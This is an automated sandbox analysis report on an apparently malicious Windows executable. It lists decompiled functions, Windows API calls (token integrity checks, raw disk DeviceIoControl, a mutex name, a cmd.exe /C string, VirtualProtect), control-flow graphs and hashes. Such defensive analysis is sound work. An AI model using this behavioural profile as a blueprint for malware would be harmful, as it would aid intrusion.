                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED313CB4A04208FFDB14CFD4C948BAEBBF8AB48301F1081AAE511B72D4D774AB04DB65
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00404380
                                                                                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404388
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000180,00520000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000178,00520000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitProcessSectionStringUnicode$AllocateChangeCloseDirectoryEnterEnumerateExitFileFindFreeInitializeLeaveLoadedLocalMemoryModuleModulesNameNotificationOpenTokenVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 41577365-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a438ef9f5f25d9aebddb8c854ded96209a6b7bafee1d22157f4d592698697d9c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b01f62542bec0b1d87828faea97dd6a3c55c304531570e4c9315d46f9a50642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a438ef9f5f25d9aebddb8c854ded96209a6b7bafee1d22157f4d592698697d9c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9411ABB290430866D710BB60EC47FDE73299B54705F0045BBB709B50C2ED7997D88EAE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 84 407ab9-407abc 85 407a69-407a8e LocalAlloc GetTokenInformation 84->85 86 407abe 84->86 88 407a94 85->88 89 40103c-40106b GetSidSubAuthorityCount GetSidSubAuthority 85->89 87 407abf-407ad2 86->87 93 408020-408024 87->93 94 407ad8-407afe call 4055b9 87->94 90 401236-40123a 88->90 91 401071 89->91 92 409c8c-409c9c OpenProcessToken 89->92 99 401240-40124a FindCloseChangeNotification 90->99 100 403bc5-403bc9 90->100 91->90 97 407a51-407a68 GetTokenInformation 92->97 98 409ca2 92->98 95 401ea5-401eb9 93->95 96 40802a-408031 93->96 109 407b04-407b0a 94->109 110 4059ea 94->110 104 402035-40203e 95->104 105 401ebf-401ed3 95->105 102 408037-408039 96->102 103 4021ce 96->103 97->85 98->90 99->100 106 40294f-402955 100->106 107 403bcf-403bd9 LocalFree 100->107 111 403d6f-403d72 102->111 103->111 112 4045e8-4045fb 104->112 105->104 113 401ed9-401ee0 105->113 107->106 109->93 110->87 115 404601-404621 call 4055b9 call 40b8c1 112->115 116 409bce-409beb call 40c187 call 40dcf9 call 40ce09 112->116 113->104 114 401ee6-401ee8 113->114 114->111 125 40b344 115->125 126 404627-40462e 115->126 132 409bf1-409bf3 116->132 133 4024fe-40250e call 40dcf9 116->133 125->112 126->125 128 404634-40463e 126->128 130 404644-40464b 128->130 131 40cc1b-40cc25 128->131 134 404651 130->134 135 409ca7-40a398 130->135 136 40cc2b-40cc32 131->136 137 40997f-409986 131->137 132->111 133->111 134->131 135->125 143 40a39e-40a3b3 135->143 136->135 139 40cc38 136->139 137->125 140 40998c 137->140 139->137 140->135 144 40a3b6 143->144 144->144
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocChangeCloseFindFreeInformationNotificationToken
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2094194634-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c14f008afbfcab52b1f24e0be9b5b67c8a06fc3440972dff98bedf792b56cd5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E215E74D04208EFCB04CFE4C959AEEBBB5AB08305F1480AAE505B7394C7746B40DF29
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 145 403aee-403b11 CreateMutexW GetLastError 146 403b17 145->146 147 403e7a 145->147 146->147
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexW.KERNELBASE(00000000,00000000,jmuZVxzUSQKZJ,?,?,004044C1,?,?,004046B5), ref: 00403AFB
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004044C1,?,?,004046B5), ref: 00403B06
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                                                                                  • String ID: jmuZVxzUSQKZJ
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1925916568-1615886713
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0594eaefbf50b0c8ed9c9a89b72dfe51cd43608961eacb7f94053228cce8ae52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D017B044A304FAE3008F50DE4DB587EA4EB10702F208036E2026A2D4E3F85A45564A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 148 403072-4030ac call 40895b CreateFileA 151 4030b2-4030b4 148->151 152 40880d-408832 DeviceIoControl 148->152 153 40c393-40c396 151->153 154 409e38-409e72 call 40572b call 40bdea call 401314 152->154 155 408838-40883a 152->155 162 409e78-409e7a 154->162 163 40bcde-40bcfa call 40d5c6 154->163 155->153 162->153 166 40bd00-40bd0a 163->166 167 403d94-403d9b call 40acfc 163->167 169 40bd10-40bd2e 166->169 170 40cbf2-40cbf4 166->170 172 403da1-403da3 167->172 173 40c213-40c225 FindCloseChangeNotification 167->173 169->167 170->153 172->153 173->153
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040895B: FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040895B: CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040895B: DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,30000080,00000000), ref: 0040309A
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0007405C,00000000,00000000,0046CB60,00000008,?,00000000), ref: 0040882A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlCreateDeviceFile$ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 678468364-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f40e64bbfca4cb1d53614c19df2d38540b9dd2651b1b1209df5de0d054ee8c58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a0e7df79db3949de73361334ad2b5bb9c35e9f163141fb49d4e1771874b744e5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f40e64bbfca4cb1d53614c19df2d38540b9dd2651b1b1209df5de0d054ee8c58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB317574F50201EBD750DB61FDC2B663364A704B08F10863AE985A62E0F7B8A5029F6F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 228 403923-40395d LocalAlloc
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000040,00000000,0040234A,00000000), ref: 0040393C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: J#@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-1245308917
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 19467080a526decec66838046e26b9bb124c136d8231779d530f3707eec05e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 96f7a68253a7caa59ed99d58a6af94cef16a1ec6a7eb00646cb3d5ddcbfd36b8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19467080a526decec66838046e26b9bb124c136d8231779d530f3707eec05e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F09BB8E04208EFCB04DF88D68189DFBF5EB48310F2081A9E948A7340D630AE41DB95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61738139d7721975275484778ac13903525e9063b07367c5274bb8a2ff343b39
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 955b2810cad582ab64bab9f2fc00926d3d94ddd31486b38c3d76b0e6824925a9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61738139d7721975275484778ac13903525e9063b07367c5274bb8a2ff343b39
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF514975A00208EFEB04CF98C591B9EBBB1EF94304F2881E9D9006B386C675EF41DB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0007405C,00000000,00000000,?,00000008,00405A0B,00000000), ref: 004015AE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000040,?,?,?,00401D6F,?,00000004), ref: 0040931A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fbf826679867081d8f65b02a643174af9db75dbf243e506da0a382be49be1460
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c1ed8782e068432966769c92f22ccf836d2bf65aa78af723960710e09a7f87a5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbf826679867081d8f65b02a643174af9db75dbf243e506da0a382be49be1460
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BD0C975A0420CBBCB00DF88E942D59BBECEB09214F004195FE0CDB240D671AE008A95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,00405A18,?,00405A18,00000070,?,?,?,00401322), ref: 0040CC68
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
